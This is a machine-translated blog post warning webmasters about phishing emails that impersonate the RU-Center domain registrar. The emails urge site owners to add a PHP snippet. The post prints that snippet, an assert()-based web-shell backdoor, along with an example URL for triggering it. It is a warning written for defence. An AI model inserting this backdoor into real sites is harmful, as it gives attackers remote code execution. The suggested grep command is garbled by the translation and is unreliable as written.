To top
Blog "Новичков Максим на QWERTY.blog"

This is an automatic translation.
Click here to read the publication in the original language.

Today, some of my friends have received letters allegedly from the RU-Center (the largest Russian domain name registrar) - nic.ru , which reads:

The letters were sent from the address info@nic.technical . In the letter, the attackers who appear on behalf of RU-Center, offer to post on the site the code of the following content:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?> 

Unfortunately, many of our colleagues who call themselves "webmasters" (numerous site owners) do not know PHP and do not think about the dangers inherent in the above code. If you pass a string as a parameter to this function, then it will be considered assert () as PHP code !!! Be carefull!

I recommend that you inspect your php projects for vulnerabilities that use the assert or eval commands. If these commands are present in the project code, do not panic - study their algorithm. It is quite possible to use the algorithms. In the case of the above example, the command will allow attackers to call your site, for example, by the parameter RUCENTER - http://sistema-audit.ru/?RUCENTER=PHP-code

We recommend that you perform a search using, for example, the linux grep -i -r 'a s s e r t' / home / www / mysite / * command, specifying the folder with the site files in order to get a list of files that use a suspicious instance Code.

Take care of yourself and your sites!

This is an automatic translation.
Click here to read the publication in the original language.

This post is available in the following languages:
Deutsch   English   Español   Français   Italiano   Русский  

Report abuse

Please note

We sent you a link to verify your email address. Do not forget to check the Spam folder. If suddenly the message got into this folder, click "Do not Spam!".

If you do not receive an email with a link to activation within the next minute, click here:

Please, wait sec.

If this attempt also fails, we recommend using a different email address for registration.